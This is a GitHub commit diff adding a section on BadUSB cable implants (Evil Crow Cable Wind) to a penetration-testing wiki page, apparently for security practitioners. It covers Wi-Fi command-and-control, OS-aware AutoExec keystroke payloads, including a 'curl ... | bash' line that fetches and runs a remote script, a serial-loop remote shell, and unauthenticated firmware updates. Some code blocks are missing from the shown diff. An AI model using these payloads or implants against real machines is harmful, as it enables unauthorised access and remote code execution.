You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: src/hardware-physical-access/physical-attacks.md
+37-1Lines changed: 37 additions & 1 deletion
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -56,7 +56,42 @@ Devices like **Rubber Ducky** and **Teensyduino** serve as platforms for creatin
56
56
57
57
Administrator privileges allow for the creation of copies of sensitive files, including the **SAM** file, through PowerShell.
58
58
59
-
---
59
+
## BadUSB / HID Implant Techniques
60
+
61
+
### Wi-Fi managed cable implants
62
+
63
+
- ESP32-S3 based implants such as **Evil Crow Cable Wind** hide inside USB-A→USB-C or USB-C↔USB-C cables, enumerate purely as a USB keyboard, and expose their C2 stack over Wi-Fi. The operator only needs to power the cable from the victim host, create a hotspot named `Evil Crow Cable Wind` with password `123456789`, and browse to [http://cable-wind.local/](http://cable-wind.local/) (or its DHCP address) to reach the embedded HTTP interface.
64
+
- The browser UI provides tabs for *Payload Editor*, *Upload Payload*, *List Payloads*, *AutoExec*, *Remote Shell*, and *Config*. Stored payloads are tagged per OS, keyboard layouts are switched on the fly, and VID/PID strings can be altered to mimic known peripherals.
65
+
- Because the C2 lives inside the cable, a phone can stage payloads, trigger execution, and manage Wi-Fi credentials without touching the host OS—ideal for short dwell-time physical intrusions.
66
+
67
+
### OS-aware AutoExec payloads
68
+
69
+
- AutoExec rules bind one or more payloads to fire immediately after USB enumeration. The implant performs lightweight OS fingerprinting and selects the matching script.
-*macOS/Linux:*`COMMAND SPACE` (Spotlight) or `CTRL ALT T` (terminal) → `STRING curl -fsSL http://10.0.0.1/init.sh | bash` → `ENTER`.
73
+
- Because execution is unattended, simply swapping a charging cable can achieve “plug-and-pwn” initial access under the logged-on user context.
74
+
75
+
### HID-bootstrapped remote shell over Wi-Fi TCP
76
+
77
+
1.**Keystroke bootstrap:** A stored payload opens a console and pastes a loop that executes whatever arrives on the new USB serial device. A minimal Windows variant is:
2.**Cable bridge:** The implant keeps the USB CDC channel open while its ESP32-S3 launches a TCP client (Python script, Android APK, or desktop executable) back to the operator. Any bytes typed into the TCP session are forwarded into the serial loop above, giving remote command execution even on air-gapped hosts. Output is limited, so operators typically run blind commands (account creation, staging additional tooling, etc.).
85
+
86
+
### HTTP OTA update surface
87
+
88
+
- The same web stack usually exposes unauthenticated firmware updates. Evil Crow Cable Wind listens on `/update` and flashes whatever binary is uploaded:
- Field operators can hot-swap features (e.g., flash USB Army Knife firmware) mid-engagement without opening the cable, letting the implant pivot to new capabilities while still plugged into the target host.
60
95
61
96
## Bypassing BitLocker Encryption
62
97
@@ -141,5 +176,6 @@ After the tenth cycle the EC sets a flag that instructs the BIOS to wipe NVRAM a
141
176
-[Pentest Partners – “Framework 13. Press here to pwn”](https://www.pentestpartners.com/security-blog/framework-13-press-here-to-pwn/)
0 commit comments